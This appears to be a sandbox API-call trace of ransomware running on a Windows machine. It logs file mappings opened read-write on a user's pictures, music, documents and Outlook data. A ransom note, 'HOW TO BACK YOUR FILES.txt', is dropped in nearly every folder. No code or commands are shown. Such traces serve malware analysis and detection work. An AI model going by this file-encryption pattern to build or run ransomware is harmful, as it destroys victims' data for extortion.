Create Mapping C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif filename = C:\Users\FD1HVy\Pictures\3WV0Ls jiLUSjUUco.gif, protection = PAGE_READWRITE, maximum_size = 71216 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png filename = C:\Users\FD1HVy\Pictures\5_uNa_SA36f77jy3w2Gv.png, protection = PAGE_READWRITE, maximum_size = 60736 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif filename = C:\Users\FD1HVy\Pictures\6iyFgn9SrZHQ KGFU.gif, protection = PAGE_READWRITE, maximum_size = 87920 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg filename = C:\Users\FD1HVy\Pictures\8IrExsVsSnK3.jpg, protection = PAGE_READWRITE, maximum_size = 9088 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png filename = C:\Users\FD1HVy\Pictures\8ZHyFqvR363JEtV.png, protection = PAGE_READWRITE, maximum_size = 49168 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\C876_Q.gif filename = C:\Users\FD1HVy\Pictures\C876_Q.gif, protection = PAGE_READWRITE, maximum_size = 59600 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\ES -V29.bmp filename = C:\Users\FD1HVy\Pictures\ES -V29.bmp, protection = PAGE_READWRITE, maximum_size = 49856 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif filename = C:\Users\FD1HVy\Pictures\f5nrkb2LotgtwH.gif, protection = PAGE_READWRITE, maximum_size = 19584 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\FCOwn.bmp filename = C:\Users\FD1HVy\Pictures\FCOwn.bmp, protection = PAGE_READWRITE, maximum_size = 33888 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\FgcCERd5K.gif filename = C:\Users\FD1HVy\Pictures\FgcCERd5K.gif, protection = PAGE_READWRITE, maximum_size = 12336 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\fJ6HL8oLrkhks9adl.jpg filename = C:\Users\FD1HVy\Pictures\fJ6HL8oLrkhks9adl.jpg, protection = PAGE_READWRITE, maximum_size = 74016 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\gTPmnYJT.gif filename = C:\Users\FD1HVy\Pictures\gTPmnYJT.gif, protection = PAGE_READWRITE, maximum_size = 77008 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\hsN3S _.jpg filename = C:\Users\FD1HVy\Pictures\hsN3S _.jpg, protection = PAGE_READWRITE, maximum_size = 5808 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Hsyb4EvKfZDCo8.gif filename = C:\Users\FD1HVy\Pictures\Hsyb4EvKfZDCo8.gif, protection = PAGE_READWRITE, maximum_size = 59968 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\i2jPXe_5_EmayX-juQ.jpg filename = C:\Users\FD1HVy\Pictures\i2jPXe_5_EmayX-juQ.jpg, protection = PAGE_READWRITE, maximum_size = 86544 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\iJsVEnd5y-jq2.png filename = C:\Users\FD1HVy\Pictures\iJsVEnd5y-jq2.png, protection = PAGE_READWRITE, maximum_size = 102512 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\iKlWqFav.png filename = C:\Users\FD1HVy\Pictures\iKlWqFav.png, protection = PAGE_READWRITE, maximum_size = 66992 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\JHLKfbZ_wnxI.jpg filename = C:\Users\FD1HVy\Pictures\JHLKfbZ_wnxI.jpg, protection = PAGE_READWRITE, maximum_size = 93536 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\jTcjMuk8-c84cV.bmp filename = C:\Users\FD1HVy\Pictures\jTcjMuk8-c84cV.bmp, protection = PAGE_READWRITE, maximum_size = 27824 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\LkpzuM_D0mU.jpg filename = C:\Users\FD1HVy\Pictures\LkpzuM_D0mU.jpg, protection = PAGE_READWRITE, maximum_size = 52240 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\M6y8KiMnNaGEd1.bmp filename = C:\Users\FD1HVy\Pictures\M6y8KiMnNaGEd1.bmp, protection = PAGE_READWRITE, maximum_size = 76704 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\N0NZDmMYf0H.bmp filename = C:\Users\FD1HVy\Pictures\N0NZDmMYf0H.bmp, protection = PAGE_READWRITE, maximum_size = 49888 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\nqh87aP.png filename = C:\Users\FD1HVy\Pictures\nqh87aP.png, protection = PAGE_READWRITE, maximum_size = 71712 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\qnFyF6.gif filename = C:\Users\FD1HVy\Pictures\qnFyF6.gif, protection = PAGE_READWRITE, maximum_size = 64528 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\QYkN2xzet.jpg filename = C:\Users\FD1HVy\Pictures\QYkN2xzet.jpg, protection = PAGE_READWRITE, maximum_size = 71008 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\rL58t9UpNE.png filename = C:\Users\FD1HVy\Pictures\rL58t9UpNE.png, protection = PAGE_READWRITE, maximum_size = 13632 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\sg1EYYvYbFWAigsa.bmp filename = C:\Users\FD1HVy\Pictures\sg1EYYvYbFWAigsa.bmp, protection = PAGE_READWRITE, maximum_size = 37536 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Sghof7ewON_UNTJ3.jpg filename = C:\Users\FD1HVy\Pictures\Sghof7ewON_UNTJ3.jpg, protection = PAGE_READWRITE, maximum_size = 96112 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\SJe4.png filename = C:\Users\FD1HVy\Pictures\SJe4.png, protection = PAGE_READWRITE, maximum_size = 33680 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\snTK_4Hws.bmp filename = C:\Users\FD1HVy\Pictures\snTK_4Hws.bmp, protection = PAGE_READWRITE, maximum_size = 16096 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\tbI35.png filename = C:\Users\FD1HVy\Pictures\tbI35.png, protection = PAGE_READWRITE, maximum_size = 69264 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\ugR0riRG8ulCowNjMAqj.jpg filename = C:\Users\FD1HVy\Pictures\ugR0riRG8ulCowNjMAqj.jpg, protection = PAGE_READWRITE, maximum_size = 64176 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\xAWhA3CWoiGQ4.bmp filename = C:\Users\FD1HVy\Pictures\xAWhA3CWoiGQ4.bmp, protection = PAGE_READWRITE, maximum_size = 48896 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Xs85b.gif filename = C:\Users\FD1HVy\Pictures\Xs85b.gif, protection = PAGE_READWRITE, maximum_size = 42608 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\YJvAER.gif filename = C:\Users\FD1HVy\Pictures\YJvAER.gif, protection = PAGE_READWRITE, maximum_size = 59296 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\zkGa22a5xC9Cll9U.gif filename = C:\Users\FD1HVy\Pictures\zkGa22a5xC9Cll9U.gif, protection = PAGE_READWRITE, maximum_size = 14000 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\_gki25reI.bmp filename = C:\Users\FD1HVy\Pictures\_gki25reI.bmp, protection = PAGE_READWRITE, maximum_size = 9056 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Pictures\Saved Pictures\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Pictures\Camera Roll\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\OneDrive\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\14B5f5HX.m4a filename = C:\Users\FD1HVy\Music\14B5f5HX.m4a, protection = PAGE_READWRITE, maximum_size = 50016 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\epqIgxA0WzcL_N3FRi.m4a filename = C:\Users\FD1HVy\Music\epqIgxA0WzcL_N3FRi.m4a, protection = PAGE_READWRITE, maximum_size = 50656 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\ivAqh4BdXoB0En.m4a filename = C:\Users\FD1HVy\Music\ivAqh4BdXoB0En.m4a, protection = PAGE_READWRITE, maximum_size = 61488 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\pKN8kzf02i2Z-2YwQdYf.mp3 filename = C:\Users\FD1HVy\Music\pKN8kzf02i2Z-2YwQdYf.mp3, protection = PAGE_READWRITE, maximum_size = 97872 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\XaND DoJCBA3Xf.mp3 filename = C:\Users\FD1HVy\Music\XaND DoJCBA3Xf.mp3, protection = PAGE_READWRITE, maximum_size = 22864 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\rsJ9UPU.wav filename = C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\rsJ9UPU.wav, protection = PAGE_READWRITE, maximum_size = 56624 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\wXxWLXtHA6IWwzbkTvK.m4a filename = C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\wXxWLXtHA6IWwzbkTvK.m4a, protection = PAGE_READWRITE, maximum_size = 11040 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\_MAxegZNMc9ssCROLe\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\dOlY5mI8x96ejt4.m4a filename = C:\Users\FD1HVy\Music\yxGMwmgC\dOlY5mI8x96ejt4.m4a, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\hqVpFTG9IIW eeHIf0.wav filename = C:\Users\FD1HVy\Music\yxGMwmgC\hqVpFTG9IIW eeHIf0.wav, protection = PAGE_READWRITE, maximum_size = 9744 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\iyvNor3BCpFxS.mp3 filename = C:\Users\FD1HVy\Music\yxGMwmgC\iyvNor3BCpFxS.mp3, protection = PAGE_READWRITE, maximum_size = 44784 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\T4BI1N3Y4nE.m4a filename = C:\Users\FD1HVy\Music\yxGMwmgC\T4BI1N3Y4nE.m4a, protection = PAGE_READWRITE, maximum_size = 49408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\yxGMwmgC\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\b1MCgDF7JU.wav filename = C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\b1MCgDF7JU.wav, protection = PAGE_READWRITE, maximum_size = 62528 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\RZMqfkHjGC7Ywnfi.wav filename = C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\RZMqfkHjGC7Ywnfi.wav, protection = PAGE_READWRITE, maximum_size = 78848 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\_9r81igxQbjAOcgmhEV.wav filename = C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\_9r81igxQbjAOcgmhEV.wav, protection = PAGE_READWRITE, maximum_size = 12944 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\yxGMwmgC\IUdpHuiNoyTnhg6M\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\2FpKVPISO.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\2FpKVPISO.mp3, protection = PAGE_READWRITE, maximum_size = 99664 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\5pycqsYyh9jtXU4a.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\5pycqsYyh9jtXU4a.mp3, protection = PAGE_READWRITE, maximum_size = 29408 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\926rqjMJjcledBP-.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\926rqjMJjcledBP-.m4a, protection = PAGE_READWRITE, maximum_size = 76896 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\H9vaiExm-o.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\H9vaiExm-o.mp3, protection = PAGE_READWRITE, maximum_size = 87984 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\OUfb1R.wav filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\OUfb1R.wav, protection = PAGE_READWRITE, maximum_size = 53792 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\u3Lej26cURF7pFaUavmI.wav filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\u3Lej26cURF7pFaUavmI.wav, protection = PAGE_READWRITE, maximum_size = 79872 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\X9wKF.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\X9wKF.m4a, protection = PAGE_READWRITE, maximum_size = 31136 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Ylq3.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Ylq3.m4a, protection = PAGE_READWRITE, maximum_size = 58528 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\cJ70uWo2V.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\cJ70uWo2V.m4a, protection = PAGE_READWRITE, maximum_size = 52256 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\gNF41DnE96kMsiC.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\gNF41DnE96kMsiC.mp3, protection = PAGE_READWRITE, maximum_size = 17344 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\Z2GhDV1FaIXkNy.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\Z2GhDV1FaIXkNy.m4a, protection = PAGE_READWRITE, maximum_size = 38688 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\Wfhv\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\9oZvTZiqj1T2ND.wav filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\9oZvTZiqj1T2ND.wav, protection = PAGE_READWRITE, maximum_size = 57488 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\osWp2.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\osWp2.mp3, protection = PAGE_READWRITE, maximum_size = 85120 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\U_ga_WJrGJ-jDmjIG.wav filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\U_ga_WJrGJ-jDmjIG.wav, protection = PAGE_READWRITE, maximum_size = 100352 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\NV_iQ\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\fRm4zP.wav filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\fRm4zP.wav, protection = PAGE_READWRITE, maximum_size = 60672 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\FSplmPyv3.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\FSplmPyv3.m4a, protection = PAGE_READWRITE, maximum_size = 101552 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\YWaVCyXnxBoBbdx.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\YWaVCyXnxBoBbdx.m4a, protection = PAGE_READWRITE, maximum_size = 83424 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\_MbUJDIbnNB86DdwXKQn.wav filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\_MbUJDIbnNB86DdwXKQn.wav, protection = PAGE_READWRITE, maximum_size = 68688 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\geOqCbV8uwQiJY9.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\geOqCbV8uwQiJY9.mp3, protection = PAGE_READWRITE, maximum_size = 20144 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\PKDoJjf.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\PKDoJjf.mp3, protection = PAGE_READWRITE, maximum_size = 56192 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\vRwHl.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\vRwHl.m4a, protection = PAGE_READWRITE, maximum_size = 39008 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\nK_uPGc\PkaVAmyKozGT3xgCy\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\D1biJ0M12k7D5tV.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\D1biJ0M12k7D5tV.mp3, protection = PAGE_READWRITE, maximum_size = 7520 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\FGCqab 6Q9IrvSbP.mp3 filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\FGCqab 6Q9IrvSbP.mp3, protection = PAGE_READWRITE, maximum_size = 82848 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\Oddm UVF74ixYdV9S.m4a filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\Oddm UVF74ixYdV9S.m4a, protection = PAGE_READWRITE, maximum_size = 77072 True 1
Fn
Create Mapping C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Music\HuzlkTkcHCiJS8Zqd\JvO3tXgHMCsM-\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Links\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Favorites\Bing.url filename = C:\Users\FD1HVy\Favorites\Bing.url, protection = PAGE_READWRITE, maximum_size = 976 True 1
Fn
Create Mapping C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Favorites\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Favorites\Links\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Downloads\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\3 jiOxfC.xlsx filename = C:\Users\FD1HVy\Documents\3 jiOxfC.xlsx, protection = PAGE_READWRITE, maximum_size = 37328 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\cuZF8zNtkH1ph ibNaP.docx filename = C:\Users\FD1HVy\Documents\cuZF8zNtkH1ph ibNaP.docx, protection = PAGE_READWRITE, maximum_size = 76544 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\Database1.accdb filename = C:\Users\FD1HVy\Documents\Database1.accdb, protection = PAGE_READWRITE, maximum_size = 348928 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\dhSD1u3DH.odt filename = C:\Users\FD1HVy\Documents\dhSD1u3DH.odt, protection = PAGE_READWRITE, maximum_size = 59616 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\dZQ_mjHLDjsbVneC6cd.docx filename = C:\Users\FD1HVy\Documents\dZQ_mjHLDjsbVneC6cd.docx, protection = PAGE_READWRITE, maximum_size = 8624 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\EAok5ewOXNobQh.ots filename = C:\Users\FD1HVy\Documents\EAok5ewOXNobQh.ots, protection = PAGE_READWRITE, maximum_size = 85984 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\FJ6mUP3Il.pptx filename = C:\Users\FD1HVy\Documents\FJ6mUP3Il.pptx, protection = PAGE_READWRITE, maximum_size = 49120 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\fsJ8kTuOCLSl-C_JQct.xlsx filename = C:\Users\FD1HVy\Documents\fsJ8kTuOCLSl-C_JQct.xlsx, protection = PAGE_READWRITE, maximum_size = 41104 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\HWI6QLOj9su4aVLe9iXw.xlsx filename = C:\Users\FD1HVy\Documents\HWI6QLOj9su4aVLe9iXw.xlsx, protection = PAGE_READWRITE, maximum_size = 22768 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\IrhwLsePMUurM.docx filename = C:\Users\FD1HVy\Documents\IrhwLsePMUurM.docx, protection = PAGE_READWRITE, maximum_size = 12912 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\JHU0USB Z-UIYlMKL9Z.pptx filename = C:\Users\FD1HVy\Documents\JHU0USB Z-UIYlMKL9Z.pptx, protection = PAGE_READWRITE, maximum_size = 92560 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\kJNpSxm0FJ.docx filename = C:\Users\FD1HVy\Documents\kJNpSxm0FJ.docx, protection = PAGE_READWRITE, maximum_size = 9072 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\NojVjWHIt.docx filename = C:\Users\FD1HVy\Documents\NojVjWHIt.docx, protection = PAGE_READWRITE, maximum_size = 40720 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\oLihILFnIluq9HK.xlsx filename = C:\Users\FD1HVy\Documents\oLihILFnIluq9HK.xlsx, protection = PAGE_READWRITE, maximum_size = 24288 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\qX7qJ7WfX.pptx filename = C:\Users\FD1HVy\Documents\qX7qJ7WfX.pptx, protection = PAGE_READWRITE, maximum_size = 4320 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\sfR3PnODJm2Om4GAN.xlsx filename = C:\Users\FD1HVy\Documents\sfR3PnODJm2Om4GAN.xlsx, protection = PAGE_READWRITE, maximum_size = 15584 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\siSo J5a.csv filename = C:\Users\FD1HVy\Documents\siSo J5a.csv, protection = PAGE_READWRITE, maximum_size = 11200 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\zGVRPL4IiUF2BCKlPu.pptx filename = C:\Users\FD1HVy\Documents\zGVRPL4IiUF2BCKlPu.pptx, protection = PAGE_READWRITE, maximum_size = 31936 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\_FMzdb HzQF-E.pptx filename = C:\Users\FD1HVy\Documents\_FMzdb HzQF-E.pptx, protection = PAGE_READWRITE, maximum_size = 67840 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\_VM7P01h9hZnAJlar.odt filename = C:\Users\FD1HVy\Documents\_VM7P01h9hZnAJlar.odt, protection = PAGE_READWRITE, maximum_size = 75056 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst filename = C:\Users\FD1HVy\Documents\Outlook Files\kkcie@kdj.kd.pst, protection = PAGE_READWRITE, maximum_size = 272128 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\Outlook Files\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt filename = C:\Users\FD1HVy\Documents\My Shapes\HOW TO BACK YOUR FILES.txt, protection = PAGE_READWRITE, maximum_size = 1868 True 1
Fn
Create Mapping C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico filename = C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico, protection = PAGE_READWRITE, maximum_size = 30704 True 1
Fn
